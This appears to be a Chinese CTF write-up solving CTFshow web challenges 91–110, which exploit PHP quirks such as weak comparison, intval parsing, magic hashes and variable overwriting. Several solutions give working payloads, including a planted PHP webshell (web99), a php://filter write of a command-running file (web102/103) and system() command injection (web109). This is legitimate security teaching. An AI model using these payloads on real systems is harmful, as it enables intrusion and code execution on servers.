《CTFshow-Web入门》10. Web 91~110
Web 入门
- 索引
- web91
- 题解
- 总结
- web92
- 题解
- 总结
- web93
- 题解
- web94
- 题解
- web95
- 题解
- web96
- 题解
- web97
- 题解
- web98
- 题解
- web99
- 题解
- 总结
- web100
- 题解
- web101
- 题解
- web102
- 题解
- web103
- 题解
- web104
- 题解
- web105
- 题解
- 总结
- web106
- 题解
- web107
- 题解
- web108
- 题解
- web109
- 题解
- web110
- 题解
ctf - web入门
索引
- web91:PHP 特性之
preg_match()
,换行解析漏洞。 - web92:PHP 特性之
intval()
,==
与===
的区别。 - web93:PHP 特性之
intval()
。 - web94:PHP 特性之
intval()
。 - web95:PHP 特性之
intval()
。 - web96:PHP 特性之
highlight_file()
、字符串匹配。 - web97:PHP 特性之
md5()
。 - web98:PHP 三元运算,GET 与 POST 传参。
- web99:PHP 特性之
in_array()
。 - web100:PHP 特性之赋值运算【=】优先级。
- web101:PHP 特性之赋值运算【=】优先级,
ReflectionClass($class)
建立反射类。 - web102:PHP 特性之赋值运算【=】优先级,
is_numeric()
特性,call_user_func()
与hex2bin()
利用,PHP 伪协议。 - web103:与 web102 没什么区别。
- web104:PHP 特性之
sha1()
,弱等于==
。 - web105:PHP 特性之变量覆盖。
- web106:PHP 特性之
sha1()
,弱等于==
。 - web107:PHP 特性之
sha1()
,弱等于==
,parse_str()
利用。 - web108:PHP 特性之
ereg()
截断漏洞。 - web109:PHP 特性之
__toString()
与类触发。 - web110:FilesystemIterator 类,
getcwd()
利用
web91
题解
^ 和 $ 这种正则匹配,只匹配一行。但是正则匹配 /m 可以执行多行匹配。
所以第一层条件是多行匹配,第二层条件是单行匹配,这样就可以用换行符 %0a 绕过。
题解:
URl + ?cmd=abc%0aphp
总结
正则表达式:
参考文章:换行解析漏洞(CVE-2017-15715)
web92
题解
这一题乍一看和 web90 很像。
但这里比较是两个等号(弱匹配比较),而 web90 是三个等号。
所以这题不能用除了 e 的字母绕过了。
php有个特殊的字母:e,可以表示科学计数法。
但是当intval()读取到e的时候就会停止。
法一:
与 web90 一样,使用非十进制数传递:
url + ?num=010574
法二:
url + ?num=4476e123
总结
php 中 ==
与 ===
的区别
两个等号是先把等号两边的变量转化成相同的类型,如果转换类型后的结果是相等的,就认为相等。
三个等号是先判断两边变量的数据类型,如果数据类型相同,再去判断两边的值,如果值相等,那么为真。
web93
题解
这题直接不能使用字母了。
根据 web90 的经验,直接进制转换(详见 web90)。
解:
url + ?num=010574
web94
题解
- strpos()
查找字符串首次出现的位置。字符串位置是从0开始。
相比上一题不能用进制转换。
但是 intval() 函数可以把浮点数类型变为 int 类型。
解:
url + ?num=4476.0
web95
题解
本题过滤了小数点,字符限制不能使用十六进制和 e。
但是可以使用 8 进制绕过。
可以通过加号或者空格绕过限制条件。
解:
url + ?num=+010574
web96
题解
字符串匹配,加上当前目录 ./ 绕过。
解:
url + ?u=./flag.php
web97
题解
根据题目,PHP md5() 函数如果传入数组,返回值将是 NULL,所以可以用数组绕过。
解:post 传递数据。
a[]=1&b[]=2
web98
题解
题目分析:
$_GET?$_GET=&$_POST:'flag';
/*
三元运算符。
$_GET 变量是一个数组,内容是 GET 方法发送的变量名称和值,类似于字典。
如果 $_GET 变量不为空,则 $_GET 变量和 $_POST 变量指向同一个地址,即$_POST 变量内容会影响 $_GET 变量的内容。
如果 $_GET 变量为空,整个三元表达式的结果为 ’flag’。
*/$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
/*
如果 flag 变量值为 ’flag’,则 $_GET 变量和 $_COOKIE 变量指向同一个地址;
否则返回flag。
*/$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
/*
如果flag变量值为’flag’,则 $_GET 变量和 $_SERVER 变量指向同一个地址;
否则返回flag。
*/highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);
/*
如果 HTTP_FLAG 变量值为 ’flag’,输出 $flag,否则输出当前文件。
*/
所以目标就是 get 传参 HTTP_FLAG=flag。
get 传参就要执行第一个三元运算,所以 post 也需要传递 HTTP_FLAG=flag。
中间两个条件会返回结果 ’flag’,没有影响。
解:通过 get 请求与 post 请求同时传递相同参数:
get 传参:
url + ?HTTP_FLAG=flag
post 传参:
HTTP_FLAG=flag
web99
题解
in_array() 函数特性:第三个参数没有设置的时候,为弱类型比较。例如比较 1.php 时会自动转换为 1 再比较。
所以这题通过 GET 传递值来命名 PHP 文件,再通过 POST 传递 webshell 写入文件。之后访问此 webshell 即可。
解:
get 传参:
url + ?n=30.php
post 传参:
content=<?php system($_POST[1]);?>
访问 webshell 30.php,并传递命令:
总结
php 函数:
- array_push():向尾部插入元素。
- in_array():检查数组中是否存在指定值。
- file_put_contents():将字符串写入文件。
in_array() 函数特性:第三个参数没有设置的时候,为弱类型比较。
web100
题解
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);if($v0){
特性:赋值【=】的优先级高于逻辑运算。所以只要让 is_numeric($v1)
返回 true 即可满足 if 判断。
if(!preg_match("/\;/", $v2)){ // v2 不能含分号if(preg_match("/\;/", $v3)){ // v3 要含分号eval("$v2('ctfshow')$v3"); // 可利用注释}
再根据以上代码分析,得出 payload:
解:
url + ?v1=1&v2=var_dump($ctfshow)/*&v3=*/;
web101
题解
与 web100 类似,但过滤了很多字符,不能使用 web100 的方法了。
由于涉及了类,可以利用 ReflectionClass 建立反射类。
new ReflectionClass($class)
可以获得类的反射对象(包含元数据信息)。
元数据对象(包含class的所有属性/方法的元数据信息)。
解:
url + ?v1=1&v2=echo new Reflectionclass&v3=;
除此以外 flag 部分字符经过了 ASCII 编码,还少了一位字符,不过爆破即可。
web102
题解
这题饶了几个圈。根据答案逆推理顺了思路。
先看题解。
将下列中括号中的代码 base64 编码,注意末尾有一个空格。
[<?=`cat *`; ]编码后的数据:
PD89YGNhdCAqYDsg再将 base64 编码后的数据进行 16 进制 ASCII 编码。
编码后的数据:
5044383959474e686443417159447367在编码后的数据前面随便加上两个占位数字,这里加 11。
115044383959474e686443417159447367同时传递以下数据:
v1=hex2bin
v2=115044383959474e686443417159447367
v3=php://filter/write=convert.base64-decode/resource=1.phpv1 以 POST 方式传输,v2,v3使用 GET。
题解:
GET 传递:
url + ?v2=115044383959474e686443417159447367&v3=php://filter/write=convert.base64-decode/resource=1.php
POST 传递:
v1=hex2bin
之后访问 1.php 查看源码即可获取 flag。
下面分析一下:
- call_user_func():
用于调用方法或者变量,第一个参数是被调用的函数,第二个是调用的函数的参数 - file_put_contents():
写入内容到文件中,第一个参数是文件名,第二个参数是内容 - hex2bin():
把十六进制值的字符串转换为 ASCII 字符(十六进制转二进制)。
所以总的思路就是将 <?=`cat *`; 代码传递并通过伪协议写入一个 php 文件,之后访问此文件就可以执行代码读取当前目录下所有文件的内容。
为什么选择以上代码写入文件,参考下列资料:
《ctfshow学习记录-web入门(php特性99-108)》:
https://blog.csdn.net/m0_48780534/article/details/125445026
web103
题解
与 web102 没有太大区别,沿用 web102 的解法。
正则表达式是用来检查是否存在 “php” 这个字符串的子串(不区分大小写)。
题解:
GET 传递:
url + ?v2=115044383959474e686443417159447367&v3=php://filter/write=convert.base64-decode/resource=1.php
POST 传递:
v1=hex2bin
之后访问 1.php 查看源码即可获取 flag。
分析见 web102。
web104
题解
sha1():计算字符串的 sha1 散列值。
这题没什么好说的,简单的传递一样的值即可。
补充,与 web97 类似,可用数组绕过。
除此以外,值的判断是使用 ==
(弱等于,详见 web92),所以找加密后 0e 开头的两个值也可以。
aaK1STfY -> 0e76658526655756207688271159624026011393aaO8zKZF -> 0e89257456677279068558073954252716165668
web105
题解
这一题涉及变量覆盖。
示例:
$a='b';
$c='d';
$b=1;
$d=0;
echo $a; # 输出 b
echo $c; # 输出 d
echo $$a; # 输出 1,即 $$a -> $b -> 1
echo $$c; # 输出 0
根据代码,尝试使用变量覆盖让 $suces
和 $error
都等于 $flag
。这样无论如何根据代码的输出都能得知 flag。
解:
GET 传参:
url + ?suces=flag
POST 传参:
error=suces
总结
变量覆盖(可变变量),用于通过变量的值来动态命名变量并访问其值。
以 PHP 为例,$$a
是一种特殊的变量语法,用来实现变量覆盖:
$foo = 'bar';
$bar = 'Hello, World!';// 使用 $$foo 来访问 $bar 的值
// 因为 $foo 的值是 'bar' ,所以 $$foo 实际上等同于 $bar
// 最终输出 'Hello, World!' 。
echo $$foo;
web106
题解
比 web104 多判断了 v1 不能等于 v2。
方法一:使用数组。
GET 传参:
url + ?v2[]=2
POST 传参:
v1[]=1
方法二:使用加密后 0e 开头的两个值。
aaK1STfY -> 0e76658526655756207688271159624026011393
aaO8zKZF -> 0e89257456677279068558073954252716165668
web107
题解
parse_str(string,array):把查询字符串解析到变量中。
parse_str("a=1&b=2",$array);
print_r($array);
# 输出:Array([a]=>1 [b]=>2)
所以根据代码 v1 传递内容是 v1=flag=?,具体值根据 v3 的 md5 值定。再加上是弱等于,只要 md5 加密后 0e 开头即可。
解:
GET:
url + ?v3=QNKCDZO
POST:
v1=flag=0
web108
题解
- ereg():用于执行正则表达式匹配。
- strrev():反转字符串。
- ereg 函数存在 NULL 截断漏洞,可以绕过正则过滤,使用 %00 截断。
0x36d,转十进制是877。
解:
url + ?c=a%00778
web109
题解
这道题用到魔术方法 __toString()
,不少 php 的内置类里都包含有这个方法,如 Reflectionclass
、Exception
、Error
、CachingIterator
。
__toString()
:当一个对象被当作字符串对待的时候,会触发这个魔术方法,格式化输出这个对象所包含的数据。
所以 echo 使得 v1 类触发 __toString()
,v2 传递的数据被输出。
对于 v2 后面的括号,只要变量后面紧跟着(),就会对这个变量作为函数进行调用。
解:
1、
url + ?v1=CachingIterator&v2=system(ls)
2、
url + ?v1=CachingIterator&v2=system('cat fl36dg.txt')
查看源码获取 flag。
也可以换成其他类。
web110
题解
过滤了很多字符,不能再用 web109 的方法。
考察:
- php 内置类,利用 FilesystemIterator 获取指定目录下的所有文件。
- getcwd() 函数,获取当前工作目录,返回当前工作目录。
解:
url + ?v1=FilesystemIterator&v2=getcwd
可以看到 flag 文件就在当前目录,直接访问获取 flag。
悔既往之失,亦要防将来之非。
——《菜根谭》(明)洪应明
相关文章:

《CTFshow-Web入门》10. Web 91~110
Web 入门 索引web91题解总结 web92题解总结 web93题解 web94题解 web95题解 web96题解 web97题解 web98题解 web99题解总结 web100题解 web101题解 web102题解 web103题解 web104题解 web105题解总结 web106题解 web107题解 web108题解 web109题解 web110题解 ctf - web入门 索…...

计组--总线
一、概念 总线是一组能为多个部件分时共享的公共信息传送线路。 共享是指总线上可以挂接多个部件,各个部件之间互相交换的信息都可以通过这组线路分时共享。 分时是指同一时刻只允许有一个部件向总线发送信息,如果系统中有多个部件,则它们…...
Git中的HEAD
Git中的HEAD HEAD^数字:表示当前提交的父提交,具体是第几个父提交通过数字指定,HEAD^1第一个父提交,该语法只 能用于合并(merge)的提交记录,因为一个通过合并产生的commit对象才有多个父提交。 HEAD~数字࿱…...

软件设计师_数据库系统_学习笔记
文章目录 3.1 数据库模式3.1.1 三级模式 两级映射3.1.2 数据库设计过程 3.2 ER模型3.3 关系代数与元组演算3.4 规范化理论3.5 并发控制3.6 数据库完整性约束3.7 分布式数据库3.8 数据仓库与数据挖掘 3.1 数据库模式 3.1.1 三级模式 两级映射 内模式直接与物理数据库相关联的 定…...

毛玻璃态计算器
效果展示 页面结构组成 从上述的效果可以看出,计算机的页面比较规整,适合grid布局。 CSS3 知识点 grid 布局 实现计算机布局 <div class"container"><form class"calculator" name"calc"><input type…...

常说的I2C协议是干啥的(电子硬件)
I2C(Inter-Integrated circuit)协议是电子传输信号中常用的一种协议。 它是一种两线式串行双向总线,用于连接微控制器和外部设备,也因为它所需的引脚数只需要两条(CLK和DATA),硬件实现简单&…...

C/C++进程超详细详解【中部分】(系统性学习day07)
目录 前言 一、守护进程 1.概念 2.守护进程创建的原理(如图清晰可见) 3.守护进程的实现(代码块) 二、dup和dup2 1,复制文件描述符 2.文件描述符重定向 三、系统日志 1,打开日志 2,向日…...
S型速度曲线轨迹规划(约束条件为速度和位移)
S型速度曲线规划的基础知识可以查看下面这篇博客: 带平滑功能的斜坡函数(多段曲线控温纯S型曲线SCL源代码+完整算法分析)_RXXW_Dor的博客-CSDN博客PLC运动控制基础系列之梯形速度曲线,可以参看下面这篇博客:PLC运动控制基础系列之梯形速度曲线_RXXW_Dor的博客-CSDN博客运…...

从零手搓一个【消息队列】实现数据的硬盘管理和内存管理(线程安全)
文章目录 一、硬盘管理1, 创建 DiskDataCenter 类2, init() 初始化3, 封装交换机4, 封装队列5, 关于绑定6, 关于消息 二、内存管理1, 数据结构的设计2, 创建 MemoryDataCenter 类3, 关于交换机4, 关于队列5, 关于绑定6, 关于消息7, 恢复数据 三、小结 创建 Spring Boot 项目, S…...

自动驾驶中的感知模型:实现安全与智能驾驶的关键
自动驾驶中的感知模型:实现安全与智能驾驶的关键 文章目录 引言感知模型的作用感知模型的技术安全与挑战结论 2023星火培训【专项营】Apollo开发者社区布道师倾力打造,包含PnC、新感知等的全新专项课程上线了。理论与实践相结合,全新的PnC培训…...

【CVPR 2023】DSVT: Dynamic Sparse Voxel Transformer with Rotated Sets
文章目录 开场白效果意图 重点VoxelNet: End-to-End Learning for Point Cloud Based 3D Object DetectionX-Axis DSVT LayerY-Axis DSVT Layer Dynamic Sparse Window AttentionDynamic set partitionRotated set attention for intra-window feature propagation.Hybrid wind…...

MySQL超入门(1)__迅速上手掌握MySQL
# 1.选择语句 # 注意事项:MySQL不区分大小写,SELECT * 代表选择全部 // 测试一 USE sql_store; -- 使用 sql_store库 SELECT * FROM customers -- 查询customers表 WHERE customer_id 1 OR customer_id 4 -- 条件判断为customer_id 1或customer_id …...

四、浏览器渲染过程,DOM,CSSDOM,渲染,布局,绘制详细介绍
知识点: 1、为什么不能先执行 js文件?? 我们不能先执行JS文件,必须等到CSSOM构建完成了才能执行JS文件,因为前面已经说过渲染树是需要DOM和CSSOM构建完成了以后才能构建,而且JS是可以操控CSS样式的&#…...

2021-06-10 51单片机设计一个蜂鸣器报警电路每秒
缘由求助一下谢谢啦51单片机_嵌入式-CSDN问答设计一个蜂鸣器报警电路,按下K1,蜂鸣器响一声,按下K2,蜂鸣器响三声,按下K3,蜂鸣器长鸣。要求响声和间隔的时间均为1秒,长鸣不限时,但是此时应设置一…...
D‘Agostino-Pearson正态检验|偏度skewness和峰度kurtosis
DAgostino-Pearson检验(也称为DAgostino和Pearson正态性检验)是一种用于检验数据是否符合正态分布的统计检验方法。它基于数据的样本统计量,主要包括偏度(skewness)和峰度(kurtosis),…...

基于树莓派CM4制作img系统镜像批量制作TF卡
文章目录 前言1. 环境与工具2. 制作镜像3. 烧录镜像4. 总结 前言 树莓派烧录完系统做定制化配置比较费时间。在面对大批量的树莓派要配置,那时间成本是非常巨大的。第一次配置完可以说是摸着石头过河,但是会弄了以后再配置,都是一些重复性操…...

【中秋国庆不断更】OpenHarmony组件内状态变量使用:@State装饰器
State装饰的变量,或称为状态变量,一旦变量拥有了状态属性,就和自定义组件的渲染绑定起来。当状态改变时,UI会发生对应的渲染改变。 在状态变量相关装饰器中,State是最基础的,使变量拥有状态属性的装饰器&am…...

【Java 进阶篇】MySQL多表关系详解
MySQL是一种常用的关系型数据库管理系统,它允许我们创建多个表格,并通过各种方式将这些表格联系在一起。在实际的数据库设计和应用中,多表关系是非常常见的,它能够更好地组织和管理数据,实现数据的复杂查询和分析。本文…...

【开发篇】十、Spring缓存:手机验证码的生成与校验
文章目录 1、缓存2、用HashMap模拟自定义缓存3、SpringBoot提供缓存的使用4、手机验证码案例完善 1、缓存 缓存是一种介于数据永久存储介质与数据应用之间的数据临时存储介质使用缓存可以有效的减少低速数据读取过程的次数(例如磁盘IO),提高…...

【Aurora 8B/10B IP(1)--初步了解】
Aurora 8B/10B IP(1)–初步了解 1 Aurora 8b/10b IP的基本状态: •通用数据通道吞吐量范围从480 Mb/s到84.48 Gb/s •支持多达16个连续粘合7GTX/GTH系列、UltraScale™ GTH或UltraScale+™ GTH收发器和4绑定GTP收发器 •Aurora 8B/10B协议规范v2.3顺从的 •资源成本低(请参…...
Python|GIF 解析与构建(5):手搓截屏和帧率控制
目录 Python|GIF 解析与构建(5):手搓截屏和帧率控制 一、引言 二、技术实现:手搓截屏模块 2.1 核心原理 2.2 代码解析:ScreenshotData类 2.2.1 截图函数:capture_screen 三、技术实现&…...
<6>-MySQL表的增删查改
目录 一,create(创建表) 二,retrieve(查询表) 1,select列 2,where条件 三,update(更新表) 四,delete(删除表…...

渗透实战PortSwigger靶场-XSS Lab 14:大多数标签和属性被阻止
<script>标签被拦截 我们需要把全部可用的 tag 和 event 进行暴力破解 XSS cheat sheet: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet 通过爆破发现body可以用 再把全部 events 放进去爆破 这些 event 全部可用 <body onres…...

关于iview组件中使用 table , 绑定序号分页后序号从1开始的解决方案
问题描述:iview使用table 中type: "index",分页之后 ,索引还是从1开始,试过绑定后台返回数据的id, 这种方法可行,就是后台返回数据的每个页面id都不完全是按照从1开始的升序,因此百度了下,找到了…...

Java-41 深入浅出 Spring - 声明式事务的支持 事务配置 XML模式 XML+注解模式
点一下关注吧!!!非常感谢!!持续更新!!! 🚀 AI篇持续更新中!(长期更新) 目前2025年06月05日更新到: AI炼丹日志-28 - Aud…...

Ascend NPU上适配Step-Audio模型
1 概述 1.1 简述 Step-Audio 是业界首个集语音理解与生成控制一体化的产品级开源实时语音对话系统,支持多语言对话(如 中文,英文,日语),语音情感(如 开心,悲伤)&#x…...

浪潮交换机配置track检测实现高速公路收费网络主备切换NQA
浪潮交换机track配置 项目背景高速网络拓扑网络情况分析通信线路收费网络路由 收费汇聚交换机相应配置收费汇聚track配置 项目背景 在实施省内一条高速公路时遇到的需求,本次涉及的主要是收费汇聚交换机的配置,浪潮网络设备在高速项目很少,通…...

无人机侦测与反制技术的进展与应用
国家电网无人机侦测与反制技术的进展与应用 引言 随着无人机(无人驾驶飞行器,UAV)技术的快速发展,其在商业、娱乐和军事领域的广泛应用带来了新的安全挑战。特别是对于关键基础设施如电力系统,无人机的“黑飞”&…...

毫米波雷达基础理论(3D+4D)
3D、4D毫米波雷达基础知识及厂商选型 PreView : https://mp.weixin.qq.com/s/bQkju4r6med7I3TBGJI_bQ 1. FMCW毫米波雷达基础知识 主要参考博文: 一文入门汽车毫米波雷达基本原理 :https://mp.weixin.qq.com/s/_EN7A5lKcz2Eh8dLnjE19w 毫米波雷达基础…...
【前端异常】JavaScript错误处理:分析 Uncaught (in promise) error
在前端开发中,JavaScript 异常是不可避免的。随着现代前端应用越来越多地使用异步操作(如 Promise、async/await 等),开发者常常会遇到 Uncaught (in promise) error 错误。这个错误是由于未正确处理 Promise 的拒绝(r…...